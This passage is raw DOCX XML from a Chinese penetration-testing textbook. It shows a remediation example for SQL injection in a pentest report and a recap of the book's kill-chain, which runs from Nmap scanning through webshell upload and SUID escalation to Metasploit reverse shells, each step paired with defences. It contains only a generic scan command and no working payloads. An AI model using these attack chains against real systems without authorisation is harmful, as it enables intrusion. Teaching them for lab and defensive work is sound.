        </w:rPr>
        <w:t xml:space="preserve">缓解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID / CIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基线，不编造细节&gt;。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">优先级：与风险等级对齐。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">示例：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">注入（严重）：使用参数化查询（预编译语句）重写所有数据库交互，禁用字符串拼接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQL。参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">查询参数化速查表。配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">规则阻断包含常见注入语法的参数（注意误报调优）。测试后确保所有数据库操作均不再拼接用户输入。”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修复建议不承诺任何“修复后绝对安全”，但指出可显著降低风险的方向。此外，报告最后可包含一个“纵深防御能力提升总述”，呼应第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的安全加固与威胁建模思想，将单一漏洞修复提升为组织的安全机制改进。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">全书路线回指：从实验室方法论到完整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> kill‑chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的脊柱回顾</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书的设计遵循“理解原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">动手搭建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">侦察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击突破</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后渗透</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御”这一闭环，最终在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中实施完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">kill‑chain，让读者体验一次受控的端到端攻击，并强制从蓝队视角为每一步配上防御清单。现在回溯全书脊柱，概览各卷的核心承重点如何串联并最终服务于攻防对称。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷一：实验室与基础方法论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Ch1–3）建立了全书的实验框架。Ch2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的靶场搭建（VulnHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / HTB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/本地虚拟机）为后续所有攻击与防御提供合法沙箱；Ch3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的渗透测试流程与报告写作规范为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报告提供了方法论骨架。没有这一基础，所有攻击操作都可能越界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷二：网络侦察与中间人攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Ch4–8）聚焦于信息收集与链路层攻击。Ch4–5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描及服务识别，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的第一个阶段“侦察”中被直接使用，命令语法如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -sC -p- &lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是标准②。Ch6–7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">展示了局域网内在假设“同一广播域内主机可信”被违反时的攻击后果——而这些原理已在《从位到物联》Ch24–25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP/以太网部分讲授，本书不再重讲，仅做攻防场景化运用。Ch8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将流量的嗅探与过滤导向了防御侧的流量监控需求，为卷五的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS/IPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">埋下伏笔。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷三：Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Ch9–12）是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill‑chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">突破外部边界最常见的入口。SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入（Ch9–10）利用输入未被严格类型化与参数化的假设缺陷，可导致数据库接管；XSS（Ch10）违反输出编码信任导致会话劫持；文件包含（LFI/RFI）和文件上传（Ch11–12）则利用路径限制和文件类型信任的缺失实现代码执行。capstone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中采用了一条典型的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击链：SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入获取凭据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上传</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> webshell → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获得初步立足点，每步均复现了卷三的靶机实验，再配以防御对照：参数化查询、输入验证、沙箱文件上传、禁用危险函数等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷四：系统与后渗透</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Ch13–18）深入主机内部。Ch13–14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的汇编与栈帧基础（回指《从位到物联》Ch13–18）为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的缓冲区溢出提权奠定理论前提①。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的提权环节，我们利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">程序漏洞（Ch15–16）从低权限账户升至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root，过程中始终指出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR/NX/Canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等缓解机制的作用。Ch17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全链路使用（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload）在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中用于搭建反弹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境②；同时强调此类操作仅在授权靶机进行，绝不面向生产系统。Ch18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的后渗透行动（维持访问、横向移动）则从正面映射到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch19–20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的防御设计：因此</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">每一步后渗透都引出了对应的检测与遏制措施，形成强制攻防对称。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷五：蓝队与检测工程、加固与专题、Capstone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Ch19–22）将前四卷所有攻击动作收敛到防御侧。Ch19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort/Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测映射可直接检出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的扫描、漏洞利用和反弹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量；Ch20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的主机加固、网络分段、最小权限和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> STRIDE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">威胁建模为整个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill‑chain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的每一步提供了阻截点。Ch21</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IoT、无线和云安全专题则是防御面的横向扩展。最后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">capstone（Ch22.1）将前述所有环节编织成一条完整的渗透流，本节（22.2）则把执行过程沉淀为正式报告并回顾整本书的学理路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">承重清单逐条回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶场搭建（Ch2）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为所有实操提供合法、隔离、可复现的沙箱。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">侦察（Ch4–5）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击信息获取起点，同时也是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测扫描流量的主要对象。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITM（Ch6–7）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">局域网信任假设的攻防体现，防御方须开启端口安全、DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Snooping、动态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">注入（Ch9–10）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据库查询假设被违反的典型，修复为参数化查询和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS（Ch10）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出编码缺失导致的客户端攻击，防御侧实施</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和严格转义。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">6.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与文件上传（Ch11–12）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件路径信任与类型信任的破坏，防御侧限制目录遍历、隔离上传目录、检查文件签名。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">7.</w:t>
      </w:r>
      <w:r>
